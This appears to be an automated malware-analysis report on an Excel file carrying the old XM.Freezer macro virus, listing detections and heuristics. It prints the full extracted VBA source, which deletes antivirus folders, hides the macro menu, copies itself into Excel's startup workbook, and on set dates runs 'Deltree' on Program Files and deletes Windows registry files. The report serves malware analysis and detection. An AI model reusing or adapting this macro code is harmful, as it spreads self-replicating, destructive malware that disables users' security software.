MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a malicious Excel file containing VBA macros. The Auto_Open macro attempts to disable antivirus software by deleting files from known AV installation directories and removes macro menu items. The `Shell()` call and the `Auto_Open` and `Auto_Close` macros indicate an attempt to execute arbitrary commands and potentially install persistence or download further payloads.
Heuristics 6
-
ClamAV: Xls.Trojan.Trasher-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Trasher-3
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2451 bytes |
SHA-256: 26eef91e9f6cc772cb633fd69a452b8650309ce302ff5aa58f44c56eeb9eac55 |
|||
|
Detection
ClamAV:
Xls.Trojan.Trasher-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
'********************************
'* Name : XM.Freezer *
'* Created : February 5, 1998 *
'* Author : ULTRAS *
'********************************
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Call Auto_Close
Kill "C:\Program Files\AntiViral Toolkit Pro\*.*"
MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\FindVirus\*.*"
MenuBars(xlModule).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\f-macro\*.*"
MenuBars(xlNoDocuments).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\Command Software\F-PROT95\*.*"
MenuBars(xlInfo).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\McAfee\VirusScan\*.*"
MenuBars(xlChart).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\Norton AntiVirus\*.*"
Call Joke
End Sub
Sub Auto_Close()
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
ULTRAS = 0
Freezer = 0
Application.ScreenUpdating = False
For b = 1 To Application.Workbooks.Count
If Application.Workbooks(b).Name = "PERSONAL.XLM" Then
ULTRAS = 1
For u = 1 To Application.Workbooks("PERSONAL.XLM").Modules.Count
If Application.Workbooks("PERSONAL.XLM").Modules(u).Name = "Sheet3" Then
Freezer = 1
End If
Next
If Freezer = 0 Then
Windows("PERSONAL.XLM").Visible = True
Application.Workbooks("Freezer.XLM").Modules("Sheet3").Copy after:=Application.Workbooks("PERSONAL.XLM").Modules(1)
Windows("PERSONAL.XLM").Visible = False
Application.Workbooks("PERSONAL.XLM").Save
End If
End If
Next
If ULTRAS = 0 Then
newname$ = ActiveWorkbook.Name
Application.Workbooks(newname$).SaveCopyAs Application.StartupPath + "\PERSONAL.XLM"
Application.Workbooks.Open (Application.StartupPath + "\PERSONAL.XLM")
Windows("PERSONAL.XLM").Visible = False
Application.Workbooks("PERSONAL.XLM").Save
End If
Application.ScreenUpdating = True
End Sub
Sub Joke()
Attribute Joke.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo HaHaHa
If Day(Now()) = 14 Then
MsgBox "You Infected XM.Freezer by ULTRAS", 16, "ULTRAS"
Shell ("Deltree /y C:\Progra~1")
End If
If Day(Now()) = 28 Then
MsgBox "You Infected XM.Freezer by ULTRAS", 48, "ULTRAS"
SetAttr "c:\windows\user.dat", 0
SetAttr "c:\windows\user.da0", 0
Kill "c:\windows\user.dat"
Kill "c:\windows\user.da0"
End If
HaHaHa:
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.